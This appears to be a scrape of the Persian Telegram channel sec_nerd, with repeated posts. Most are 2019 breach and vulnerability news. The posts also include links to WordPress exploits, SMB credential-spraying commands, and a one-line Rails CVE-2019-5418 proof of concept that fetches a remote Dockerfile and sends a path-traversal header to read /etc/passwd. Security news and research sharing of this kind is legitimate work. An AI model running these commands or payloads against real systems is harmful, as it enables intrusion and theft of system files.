دیتابیس تعدادی از افراد حقیقی و حقوقی از داوجونز به سرقت رفت.
این دیتابیس که از نوع elasticsearch بوده و بر روی یکی از سرورهای آمازون قرار داشت حاوی اطلاعات بیش از 2.4 میلیون شخص و سازمان بود.
دیتابیس مذکور حاوی اطلاعاتی از مشتریان پرخطر از جمله سیاستمداران، مجرمان و تروریست ها بوده است.
https://techcrunch.com/2019/02/27/dow-jones-watchlist-leak/
#news
#breach
#elasticsearch
#nosql
@sec_nerd
این دیتابیس که از نوع elasticsearch بوده و بر روی یکی از سرورهای آمازون قرار داشت حاوی اطلاعات بیش از 2.4 میلیون شخص و سازمان بود.
دیتابیس مذکور حاوی اطلاعاتی از مشتریان پرخطر از جمله سیاستمداران، مجرمان و تروریست ها بوده است.
https://techcrunch.com/2019/02/27/dow-jones-watchlist-leak/
#news
#breach
#elasticsearch
#nosql
@sec_nerd
TechCrunch
Dow Jones’ watchlist of 2.4 million high-risk individuals has leaked
A watchlist of risky individuals and corporate entities owned by Dow Jones has been exposed, after a company with access to the database left it on a server without a password.
This media is not supported in your browser
VIEW IN TELEGRAM
کد اکسپلویت جدید برای وردپرس با شناسه های CVE-2019-8942 و CVE-2019-8943
https://gist.github.com/allyshka/f159c0b43f1374f87f2c3817d6401fd6
#wordpress
#wp
#exploit
#rce
#web
#php
@sec_nerd
https://gist.github.com/allyshka/f159c0b43f1374f87f2c3817d6401fd6
#wordpress
#wp
#exploit
#rce
#web
#php
@sec_nerd
1) pip3 install -r requirements.txt
sudo apt-get install cifs-utils
2) git clone https://github.com/nikallass/sharesearch.git
3) python3 https://sharesearch.py -p all -w -v -H hosts.lst -C creds.lst
#privesc
#smb
@sec_nerd
sudo apt-get install cifs-utils
2) git clone https://github.com/nikallass/sharesearch.git
3) python3 https://sharesearch.py -p all -w -v -H hosts.lst -C creds.lst
#privesc
#smb
@sec_nerd
نمایش متاسپلویت در مستند جنجالی صداوسیما .
اذعان به توان شنود واتس اپ در مستند مذکور!
(لینک ویدیوی کامل)
https://www.youtube.com/watch?v=jThOWaXKS70
#iran
#whatsapp
@sec_nerd
اذعان به توان شنود واتس اپ در مستند مذکور!
(لینک ویدیوی کامل)
https://www.youtube.com/watch?v=jThOWaXKS70
#iran
@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
ابزاری که بر اساس خروجی systeminfo آسیب پذیری های احتمالی موجود در سیستم ویندوزی را لیست میکند.
https://github.com/bitsadmin/wesng
#windows
#privesc
#exploit
@sec_nerd
https://github.com/bitsadmin/wesng
#windows
#privesc
#exploit
@sec_nerd
باج افزار جدیدی که با آسیب پذیری winrar با شناسه CVE-2018-20250 منتشر میشود!
نام فایل: vk_4221345.rar
#ransomware
#news
#winrar
@sec_nerd
نام فایل: vk_4221345.rar
#ransomware
#news
#winrar
@sec_nerd
یک روزنامه سعودی گزارش داد هکرهای ایرانی موفق شدند گوشی های همراه همسر و پسر نتانیاهو را هک کنند!
البته این خبر از سوی دفتر نتانیاهو تکذیب شده است اما Karine Elharar یکی از اعضای Yesh Atid (حزب مرکزی) در توییتی به نتانیاهو کنایه زده و ضعف او در حفظ حریم خانوادگی خود را مورد تمسخر قرار داده است.
گویا این حمله چند ماه پیش انجام شده و مشخص نیست چه اطلاعاتی از این دو فرد به دست هکرهای ایرانی افتاده است.
https://www.independentarabia.com/node/13286/%D8%A7%D9%84%D8%A3%D8%AE%D8%A8%D8%A7%D8%B1/%D8%A7%D9%84%D8%B4%D8%B1%D9%82-%D8%A7%D9%84%D8%A3%D9%88%D8%B3%D8%B7/%D9%87%D9%84-%D8%AA%D9%86%D8%B5%D8%AA%D8%AA-%D8%A5%D9%8A%D8%B1%D8%A7%D9%86-%D8%B9%D9%84%D9%89-%D9%86%D8%AA%D9%86%D9%8A%D8%A7%D9%87%D9%88-%D8%A8%D9%88%D8%A7%D8%B3%D8%B7%D8%A9-%D9%87%D8%A7%D8%AA%D9%81%D9%8A-%D8%B2%D9%88%D8%AC%D8%AA%D9%87-%D9%88%D8%A7%D8%A8%D9%86%D9%87-%D9%8A%D8%A7%D8%A6%D9%8A%D8%B1%D8%9F
https://www.jpost.com/Arab-Israeli-Conflict/Saudi-report-Iranians-hacked-the-phones-of-Yair-and-Sara-Netanyahu-583909
#iran
#israel
#news
#breach
@sec_nerd
البته این خبر از سوی دفتر نتانیاهو تکذیب شده است اما Karine Elharar یکی از اعضای Yesh Atid (حزب مرکزی) در توییتی به نتانیاهو کنایه زده و ضعف او در حفظ حریم خانوادگی خود را مورد تمسخر قرار داده است.
گویا این حمله چند ماه پیش انجام شده و مشخص نیست چه اطلاعاتی از این دو فرد به دست هکرهای ایرانی افتاده است.
https://www.independentarabia.com/node/13286/%D8%A7%D9%84%D8%A3%D8%AE%D8%A8%D8%A7%D8%B1/%D8%A7%D9%84%D8%B4%D8%B1%D9%82-%D8%A7%D9%84%D8%A3%D9%88%D8%B3%D8%B7/%D9%87%D9%84-%D8%AA%D9%86%D8%B5%D8%AA%D8%AA-%D8%A5%D9%8A%D8%B1%D8%A7%D9%86-%D8%B9%D9%84%D9%89-%D9%86%D8%AA%D9%86%D9%8A%D8%A7%D9%87%D9%88-%D8%A8%D9%88%D8%A7%D8%B3%D8%B7%D8%A9-%D9%87%D8%A7%D8%AA%D9%81%D9%8A-%D8%B2%D9%88%D8%AC%D8%AA%D9%87-%D9%88%D8%A7%D8%A8%D9%86%D9%87-%D9%8A%D8%A7%D8%A6%D9%8A%D8%B1%D8%9F
https://www.jpost.com/Arab-Israeli-Conflict/Saudi-report-Iranians-hacked-the-phones-of-Yair-and-Sara-Netanyahu-583909
#iran
#israel
#news
#breach
@sec_nerd
اندبندنت عربية
هل تنصتت إيران على نتانياهو بواسطة هاتفي زوجته وابنه يائير؟
في اعقاب الكشف عن خرق إيراني لهاتف بيني غانتس رئيس الأركان السابق والمرشح لرئاسة الحكومة في إسرائيل يتضح أيضا من معلومات حصلت عليها "اندبندنت عربية" أن إيران كانت خرقت قبل فترة ليست بالبعيدة هاتفي
حزب آبی و سفید اسراییل از دادستان این رژیم خواست در خصوص نحوه لو رفتن اطلاعات مرتبط با نفوذ ایرانی ها به تلفن همراه رهبر این حزب اسراییلی به نام Benny Gantz تحقیق کند.
به نظر این حزب، انتشار اخبار مرتبط با این موضوع در ایام نزدیک به انتخابات این رژیم از کانال ۱۲ اسراییل بر روی روند انتخابات تاثیر خواهد گذاشت.
گانتز که پیش از این وزیر جنگ اسراییل بود پنج هفته پیش از سوی آژانس امنیت اسراییل مطلع شد که هک شده است. این نفوذ پنج ماه پیش رخ داده و اطلاعات فردی و پیام های کوتاه از گوشی گانتز به سرقت رفته اند.
اطلاعات بیشتر:
https://www.jta.org/quick-reads/leak-of-alleged-iranian-hack-into-benny-gantz-personal-phone-could-affect-election-outcome
#news
#iran
#israel
#breach
@sec_nerd
به نظر این حزب، انتشار اخبار مرتبط با این موضوع در ایام نزدیک به انتخابات این رژیم از کانال ۱۲ اسراییل بر روی روند انتخابات تاثیر خواهد گذاشت.
گانتز که پیش از این وزیر جنگ اسراییل بود پنج هفته پیش از سوی آژانس امنیت اسراییل مطلع شد که هک شده است. این نفوذ پنج ماه پیش رخ داده و اطلاعات فردی و پیام های کوتاه از گوشی گانتز به سرقت رفته اند.
اطلاعات بیشتر:
https://www.jta.org/quick-reads/leak-of-alleged-iranian-hack-into-benny-gantz-personal-phone-could-affect-election-outcome
#news
#iran
#israel
#breach
@sec_nerd
Jewish Telegraphic Agency
Leak of alleged Iranian hack into Benny Gantz's personal phone could affect election outcome - Jewish Telegraphic Agency
The Blue and White party has asked Israel's attorney general to investigate the link, claiming that it could only have come from the Prime Minister's Office.
یک شبکه تلویزیونی اسراییلی گزارش داد اطلاعات کامپیوتر شخصی و تلفن ایهود باراک، نخست وزیر سابق اسراییل توسط هکرها به سرقت رفت و به ایران فروخته شد.
مسئول آژانس امنیت اسراییل شش ماه پیش این موضوع را به باراک اطلاع داده بود.
https://www.cjnews.com/news/israel/ehud-baraks-cell-phone-and-personal-computer-hacked-information-sold-to-iran
#news
#iran
#israel
#breach
@sec_nerd
مسئول آژانس امنیت اسراییل شش ماه پیش این موضوع را به باراک اطلاع داده بود.
https://www.cjnews.com/news/israel/ehud-baraks-cell-phone-and-personal-computer-hacked-information-sold-to-iran
#news
#iran
#israel
#breach
@sec_nerd
The Canadian Jewish News
Ehud Barak’s cell phone and personal computer hacked; information sold to Iran
The cell phone and personal computer of former Israeli prime minister Ehud Barak were hacked and the information sold to Iran, an Israeli television news channel reported.
Ruby on Rails CVE-2019-5418 tweet-PoC
curl -sL https://goo.gl/NFR6fJ > /tmp/NFR6fJ; docker build -f /tmp/NFR6fJ -t 2019-5418 .; docker run -d --name 2019-5418 -p3000:3000 2019-5418; sleep 4; curl -H 'Accept: ../../../../../../../../etc/passwd{{' 'https://localhost:3000/robots';
#ruby
#pentest
#exploit
@sec_nerd
curl -sL https://goo.gl/NFR6fJ > /tmp/NFR6fJ; docker build -f /tmp/NFR6fJ -t 2019-5418 .; docker run -d --name 2019-5418 -p3000:3000 2019-5418; sleep 4; curl -H 'Accept: ../../../../../../../../etc/passwd{{' 'https://localhost:3000/robots';
#ruby
#pentest
#exploit
@sec_nerd
یَا مُقَلِّبَ الْقُلُوبِ وَ الْأَبْصَارِ
یَا مُدَبِّرَ اللَّیْلِ وَ النَّهَار
یَا مُحَوِّلَ الْحَوْلِ وَ الْأَحْوَالِ
حَوِّلْ حَالَنَا
إِلَی أَحْسَنِ الْحَال
سال ۹۸ بر تمامی همراهان مبارکباد
@sec_nerd
یَا مُدَبِّرَ اللَّیْلِ وَ النَّهَار
یَا مُحَوِّلَ الْحَوْلِ وَ الْأَحْوَالِ
حَوِّلْ حَالَنَا
إِلَی أَحْسَنِ الْحَال
سال ۹۸ بر تمامی همراهان مبارکباد
@sec_nerd
Forwarded from Pavel Durov
How did you like the privacy-focused update of Telegram?
Anonymous Poll
56%
Awesome, keep it up! 👍
44%
Awful, take it back 👎
Forwarded from وب آموز (m J)
⭕️ این نظرسنجی رو پاول دورف در رابطه با قابلیت حذف پیام طرفین در چت خصوصی منتشر کرده ، توجه کنید که تلگرام بستر بسیار مناسبی برای کلاهبرداری است و اگر کلاهبردارها و دزدها بتوانند پیام شما رو هم پاک کنن! (که در بروزرسانی اخیر میتونن!) دیگه هیچ شواهدی برای ارائه به مراجع قضایی ندارید. لذا این قابلیت بسیار عجیب و مخرب ه، اگر موافق هستید، گزینه Awful, take it back رو بزنید و این نظرسنجی رو بازنشر کنید.
🆔 @Webamoozir
🆔 @Webamoozir
حتما در طی روزهای اخیر در مورد آسیب پذیری اجرای دستور از راه دور در روترهای سیسکو سری های RV320 و RV325 خبرهایی خوانده اید که جزییات آن در لینک زیر قابل مشاهده است:
https://www.redteam-pentesting.de/en/advisories/rt-sa-2019-005/-cisco-rv320-command-injection
اما وصله ی منتشر شده توسط سیسکو که مورد اعتراض کارشناسان نیز قرار گرفته است فقط درخواست مهاجم را بررسی میکند و اگر این درخواست با دستور curl اجرا شده باشد (اگر هدر درخواست ارسال شده مطابق با useragent مورد استفاده توسط دستور curl باشد) آن را متوقف میکند که این فیلتر به راحتی قابل دور زدن میباشد!
#news
#cisco
#exploit
#rce
@sec_nerd
https://www.redteam-pentesting.de/en/advisories/rt-sa-2019-005/-cisco-rv320-command-injection
اما وصله ی منتشر شده توسط سیسکو که مورد اعتراض کارشناسان نیز قرار گرفته است فقط درخواست مهاجم را بررسی میکند و اگر این درخواست با دستور curl اجرا شده باشد (اگر هدر درخواست ارسال شده مطابق با useragent مورد استفاده توسط دستور curl باشد) آن را متوقف میکند که این فیلتر به راحتی قابل دور زدن میباشد!
#news
#cisco
#exploit
#rce
@sec_nerd